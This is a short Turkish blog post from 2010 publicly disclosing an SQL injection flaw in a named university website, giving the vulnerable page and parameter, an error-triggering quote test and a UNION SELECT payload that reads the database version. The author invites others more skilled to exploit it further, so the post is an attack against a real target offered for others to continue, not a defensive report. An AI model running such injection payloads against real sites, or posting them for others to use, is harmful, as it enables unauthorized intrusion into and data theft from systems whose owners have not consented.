1 Şubat 2010 Pazartesi

yildiz.edu.tr sql injection

 http://www.yildiz.edu.tr/face/templates/oneAnnounceItem.php?duyuruNo=1244  'a ekleyin explorer'in titlesine bakın bir hata oluştu diyor..

http://www.yildiz.edu.tr/face/templates/oneAnnounceItem.php?duyuruNo=-1244 UNION SELECT  column degeri vermeyince  alttaki gibi bir hata veriyor yani birda SQL İNJECTİON acıgımız var..

SQL de bir hata oluştu. (getNewsFiles function) id = -1244 UNION SELECT 
Geri dönmek için lütfen burayı tıklayınız.  


Manuel Link :    http://www.yildiz.edu.tr/face/templates/oneAnnounceItem.php?duyuruNo=-1244 UNION SELECT null,null,null,null,null,version()--

PHP/4.4.4 version  çok ugraştım ama ben bişi yapamadım belki daha iyi anlıyan arkadaşlar yapar..

Hiç yorum yok :

Yorum Gönderme